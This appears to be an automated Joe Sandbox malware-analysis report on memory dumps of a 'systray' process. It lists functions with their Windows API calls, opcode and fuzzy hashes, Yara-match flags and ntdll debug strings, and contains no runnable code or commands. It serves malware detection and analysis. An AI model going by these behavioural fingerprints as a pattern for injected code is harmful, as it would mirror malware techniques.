Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1102b38d6527627b9aa694b7358922b2b0cabdfebc3ca48fcbda6c1aeeeff8cc
Instruction ID: 883540a0595f39b8f7a8ca555b29ba9562468935a604f26a119b71bf856447c7
Opcode Fuzzy Hash: 1102b38d6527627b9aa694b7358922b2b0cabdfebc3ca48fcbda6c1aeeeff8cc
Instruction Fuzzy Hash: 04900265251001032109A55B07045270096A7D53D5351C021F5046550CD661D8657161

Uniqueness

Uniqueness Score: -1.00%

Function 045D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D991A

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 13a3f482497550bd498133e60a649e18a24c5c9b3175a4940e8b2598b3c9f307
Instruction ID: a0ef5f59533fb40f667e4d894751da9298a7d76f65738e0550d404ba9edea616
Opcode Fuzzy Hash: 13a3f482497550bd498133e60a649e18a24c5c9b3175a4940e8b2598b3c9f307
Instruction Fuzzy Hash: 119002B124100502F144715B44047660055A7D0385F51C011A9095554E8699DDD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 045D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D95DA

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f0d65856080d94a8acabe32d8ca9bccd798adcc65bfadb620c39f4b82075a3ef
Instruction ID: 7d23e489e88748d95d899785ff1405c5709f3ec85da02861cc273dcfed9cc6a9
Opcode Fuzzy Hash: f0d65856080d94a8acabe32d8ca9bccd798adcc65bfadb620c39f4b82075a3ef
Instruction Fuzzy Hash: C09002A1242001036109715B4414636405AA7E0285B51C021E5045590DC565D8957165

Uniqueness

Uniqueness Score: -1.00%

Function 045D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D99AA

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a41c9bab87b55d2c192c189baa76c1f29c77f4ec94b078ec5bdf07fab745dbf
Instruction ID: 049654852b66d20ba98117b47272c31235bc1f9f4558100273dc1a1d3658dcc4
Opcode Fuzzy Hash: 1a41c9bab87b55d2c192c189baa76c1f29c77f4ec94b078ec5bdf07fab745dbf
Instruction Fuzzy Hash: 829002A138100542F104615B4414B260055E7E1385F51C015E5095554D8659DC567166

Uniqueness

Uniqueness Score: -1.00%

Function 045D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D9A5A

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d34b6a62ff1ff3e4608a9ff33fdc56b64d367d83a1394c5fd1be1754d4ff2699
Instruction ID: 52172f772d3e3de3271fa5cfbe93b8a7f9444a64966019db70d6cd09ecb7dcfb
Opcode Fuzzy Hash: d34b6a62ff1ff3e4608a9ff33fdc56b64d367d83a1394c5fd1be1754d4ff2699
Instruction Fuzzy Hash: E190026125180142F204656B4C14B270055A7D0387F51C115A4185554CC955D8657561

Uniqueness

Uniqueness Score: -1.00%

Function 045D9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D965A

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36bc01357702843f6a9c92700a066272005f80cb7bc4f3c62023e0b9d7874750
Instruction ID: 6fbb07835b4a41defc813a4f39eef3f5aa27bdd541ec912254f997e697b92103
Opcode Fuzzy Hash: 36bc01357702843f6a9c92700a066272005f80cb7bc4f3c62023e0b9d7874750
Instruction Fuzzy Hash: 7990027124504942F144715B4404A660065A7D0389F51C011A4095694D9665DD59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 045D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D966A

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55f72a18b095d67f1328e998beee1c0b89c91765bfdcfc85db69d954fcfde183
Instruction ID: 6f7a23df1e8c60e2215ad4936b3ed68942ae098b88955508ca1ad6b4b08b868a
Opcode Fuzzy Hash: 55f72a18b095d67f1328e998beee1c0b89c91765bfdcfc85db69d954fcfde183
Instruction Fuzzy Hash: A790027124100902F184715B440466A0055A7D1385F91C015A4056654DCA55DA5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 045D96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D96DA

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3072d3446a8682e604f84a512a90946fefb030097614a4ccba21b1f71332acb2
Instruction ID: 223105ee1576860ff6243eca63384e83032a6dd1c16a1f01e962ba3a8dd6d726
Opcode Fuzzy Hash: 3072d3446a8682e604f84a512a90946fefb030097614a4ccba21b1f71332acb2
Instruction Fuzzy Hash: 9190027124100942F104615B4404B660055A7E0385F51C016A4155654D8655D8557561

Uniqueness

Uniqueness Score: -1.00%

Function 045D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D96EA

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef082f3f985499c7fce8c9fc256de8abbdaa73bfb1b918c937a235fcbc769505
Instruction ID: 6dbcb55b68f6640b4856031de6535ea01ae2eeede1c8d3c4158062bf1689a597
Opcode Fuzzy Hash: ef082f3f985499c7fce8c9fc256de8abbdaa73bfb1b918c937a235fcbc769505
Instruction Fuzzy Hash: B490027124108902F114615B840476A0055A7D0385F55C411A8455658D86D5D8957161

Uniqueness

Uniqueness Score: -1.00%

Function 045D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D971A

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 53b6a352c09507f6c3b8454cd786f964d72151e41962751af06808c7d81c1f2c
Instruction ID: af51584217e1f381283a48fd1d3e25c413ecf16029e9bf62bb87c5fded73c5b6
Opcode Fuzzy Hash: 53b6a352c09507f6c3b8454cd786f964d72151e41962751af06808c7d81c1f2c
Instruction Fuzzy Hash: AC90027124100502F104659B54086660055A7E0385F51D011A9055555EC6A5D8957171

Uniqueness

Uniqueness Score: -1.00%

Function 045D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D9FEA

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48153e11498c9ddfa7f7bd787746678e9adbe34be1d52cfac07cdf97ec9d0b80
Instruction ID: ea2838ad5e59f49acb1f9b7850642f29fb96bc55f9e266087545fd24568a3ff3
Opcode Fuzzy Hash: 48153e11498c9ddfa7f7bd787746678e9adbe34be1d52cfac07cdf97ec9d0b80
Instruction Fuzzy Hash: 6D90027135114502F114615B84047260055A7D1285F51C411A4855558D86D5D8957162

Uniqueness

Uniqueness Score: -1.00%

Function 045D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D978A

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 548063bb2993732c9bdb74c886fe0ca3e5b75ec8ee1a7ea3110e924171e9db73
Instruction ID: 978f1d8a7f2ae88f1480303772f945a2193cdf485b9720e97f908fc8294cd700
Opcode Fuzzy Hash: 548063bb2993732c9bdb74c886fe0ca3e5b75ec8ee1a7ea3110e924171e9db73
Instruction Fuzzy Hash: 5490026925300102F184715B540862A0055A7D1286F91D415A4046558CC955D86D7361

Uniqueness

Uniqueness Score: -1.00%

Function 0018A053, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00173AF8), ref: 0018A08D

Strings

.z`, xrefs: 0018A07C, 0018A088

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 1833f635f3e21e292991f3de5bb37276af0c8193f15fa197d16a89ed479716a1
Instruction ID: d4767c65ee085a484ec6d0038693eb6e22d31d961b20ac1689e959b65a6ff483
Opcode Fuzzy Hash: 1833f635f3e21e292991f3de5bb37276af0c8193f15fa197d16a89ed479716a1
Instruction Fuzzy Hash: 2AF0F0716442046FDB10FFA8DC46DE73768EF88320F018586FD9C9B202C230EA108BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0018A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00173AF8), ref: 0018A08D

Strings

.z`, xrefs: 0018A07C, 0018A088

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: c0b4c876b98049afca1ee9bbdaef93e9244f26ae635a45d783c86bb059cbdf81
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 0FE012B1200208ABDB18EF99CC49EA777ACAF88750F018599FA585B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 001782F0, Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0017834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0017836B

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 82079f10d3c2bb338251c77b1746ba6aed9656e107e48eb6c4cfa7d71c1448a4
Instruction ID: c43d186c709c5d39646bdcedd2f65ee2aea592f93fefa46c69c1500f0d56bb15
Opcode Fuzzy Hash: 82079f10d3c2bb338251c77b1746ba6aed9656e107e48eb6c4cfa7d71c1448a4
Instruction Fuzzy Hash: 38018431A802287BE721A6989C47FBE766C6B50B51F144118FF08BA1C1EB956A0647F6

Uniqueness

Uniqueness Score: -1.00%

Function 001782EB, Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0017834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0017836B

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 7918b957c25e900fa977a9975389a1140a5028e67135c7be16046828477bcaa9
Instruction ID: adc37b271abaffce564f044f2bfbf3c650c1dcf1ea444a3631ffe07843fcd6a5
Opcode Fuzzy Hash: 7918b957c25e900fa977a9975389a1140a5028e67135c7be16046828477bcaa9
Instruction Fuzzy Hash: A0018831A802187BE721A6949C47FFE772C7F50B55F144114FF08BA1C1EB956A0547F5

Uniqueness

Uniqueness Score: -1.00%

Function 0017ACB3, Relevance: 1.6, APIs: 1, Instructions: 66
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0017AD32

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 58a65aae0d3f289b1bbd7ac078db50ae86a016efc8347129f58172f459a08c14
Instruction ID: e3562cbf66c9ab449c51d99111d1e8d5e2791bf8dca48870ceab2428f316c2c1
Opcode Fuzzy Hash: 58a65aae0d3f289b1bbd7ac078db50ae86a016efc8347129f58172f459a08c14
Instruction Fuzzy Hash: 48113F3590814D6BDB21DBA4D845ABCB7749F91308F048196D94C8B142F7319A48C792

Uniqueness

Uniqueness Score: -1.00%

Function 0017ACC0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0017AD32

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: c2decc3460459ce1bac3f5f5836d96a9939bc8e82055be57644019f4598f490d
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: 1E011EB5D4020DABDB10EAE4EC42F9EB378AF54308F4085A5A90D97241F731EB54CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0018A092, Relevance: 1.5, APIs: 1, Instructions: 45
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0018A124

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 813edb78cd1334d5ba3ee33aac08ae8e99ae7eecb60f07bb091d68f6c6c5a22b
Instruction ID: c2caff7a0ccde91efc8419dfba78c2f4a106e31d9d3417a2f5cd8eca93443043
Opcode Fuzzy Hash: 813edb78cd1334d5ba3ee33aac08ae8e99ae7eecb60f07bb091d68f6c6c5a22b
Instruction Fuzzy Hash: 79013CB2644119AFDB14DF98DC85EEB77ADEF8C350F118259FA5CD7240C231EA118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0018A124

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 21b30c26ed4763361d14d114036541ddc97d26dde010edfe162c8f1a4945b346
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 9701B2B2214108BFCB54DF89DC81EEB77ADAF8C754F158258FA4D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0018A0CD, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0018A124

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 6568c6f1e6253b2b02eb30758e7b714880dbda6b73f2441df9ffdc7279775669
Instruction ID: 08f0062f5e974ee7b608718773ee26ca65cc0a8c63977493eb324e6e5b414510
Opcode Fuzzy Hash: 6568c6f1e6253b2b02eb30758e7b714880dbda6b73f2441df9ffdc7279775669
Instruction Fuzzy Hash: DA01B2B2210108BFCB54DF99DD80EEB37ADAF8C754F158248FA4DA7250C630E951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018A1B7, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0017F192,0017F192,?,00000000,?,?), ref: 0018A1F0

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 113cd6751c334813f425fca246b6023a88eaf8a33c14c2ed373027101bf1ccec
Instruction ID: 56819f9ed0bcf05f8fdd919b40ea3b1678f427408cce804fd3c4edf70180ca0d
Opcode Fuzzy Hash: 113cd6751c334813f425fca246b6023a88eaf8a33c14c2ed373027101bf1ccec
Instruction Fuzzy Hash: 88F0A9B9204204AFEB10EF69DC85D9B3BA8EF84350F11855AFDE857202C630E9108BB2

Uniqueness

Uniqueness Score: -1.00%

Function 0018A020, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(001844F6,?,00184C6F,00184C6F,?,001844F6,?,?,?,?,?,00000000,00000000,?), ref: 0018A04D

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 17e8cc399ffb6a09b809b22d02fb6e3212f4d1ad0ffe1c48e945b257afe9ed6f
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 21E012B1200208ABDB14EF99CC41EA777ACAF88654F118599FA585B242C630F9108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0018A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0017F192,0017F192,?,00000000,?,?), ref: 0018A1F0

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: e7bb114500fe75c87134f235cda2ae89cf967753b4c687adbc66b62f36d38c92
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: CDE01AB1600208ABDB10EF49CC85EE737ADAF88650F018155FA4C57241CA34E9108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0017F687, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,00178CF4,?), ref: 0017F6BB

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8edbe3729de3733b21f8ed8db093e17e711b582bef10c3ecbd40d2fb00b2368d
Instruction ID: 05b46d86b8b27bd64e44958691586c1fc072ce536cc42bea082df66a84f27d13
Opcode Fuzzy Hash: 8edbe3729de3733b21f8ed8db093e17e711b582bef10c3ecbd40d2fb00b2368d
Instruction Fuzzy Hash: 1FE0C273A903053FE710EAA4DC03FBA3298AB65711F184078F94CEB2C3EB18D0024560

Uniqueness

Uniqueness Score: -1.00%

Function 0017F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,00178CF4,?), ref: 0017F6BB

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: db5f5061f9013b61f9b5a262e6c827fa793f6ca12042b6bc679c4cdb0bad1a74
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 18D052726903082BEA10BAA89C03F663288AB54B00F494068FA48AA2C3EA64E5018665

Uniqueness

Uniqueness Score: -1.00%

Function 045D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D9694

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dee7332ac4216be31e7ad7a1070bfdfe73aa778b9c6cf5f74467068656396676
Instruction ID: 7a557385e4b00852d5b676f671d2464c92e6458dc5a901dc58c526dcbd4b8637
Opcode Fuzzy Hash: dee7332ac4216be31e7ad7a1070bfdfe73aa778b9c6cf5f74467068656396676
Instruction Fuzzy Hash: 11B02BB19010C1C5F710D7710A0873739007BC0340F12C011D1020240A0338D080F2B2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0464B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

*** An Access Violation occurred in %ws:%s, xrefs: 0464B48F
*** then kb to get the faulting stack, xrefs: 0464B51C
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0464B3D6
*** enter .cxr %p for the context, xrefs: 0464B50D
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0464B38F
*** enter .exr %p for the exception record, xrefs: 0464B4F1
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0464B476
write to, xrefs: 0464B4A6
*** Resource timeout (%p) in %ws:%s, xrefs: 0464B352
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0464B2F3
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0464B314
a NULL pointer, xrefs: 0464B4E0
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0464B2DC
The resource is owned shared by %d threads, xrefs: 0464B37E
This failed because of error %Ix., xrefs: 0464B446
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0464B53F
<unknown>, xrefs: 0464B27E, 0464B2D1, 0464B350, 0464B399, 0464B417, 0464B48E
Go determine why that thread has not released the critical section., xrefs: 0464B3C5
an invalid address, %p, xrefs: 0464B4CF
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0464B305
read from, xrefs: 0464B4AD, 0464B4B2
The instruction at %p tried to %s , xrefs: 0464B4B6
The resource is owned exclusively by thread %p, xrefs: 0464B374
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0464B39B
The instruction at %p referenced memory at %p., xrefs: 0464B432
The critical section is owned by thread %p., xrefs: 0464B3B9
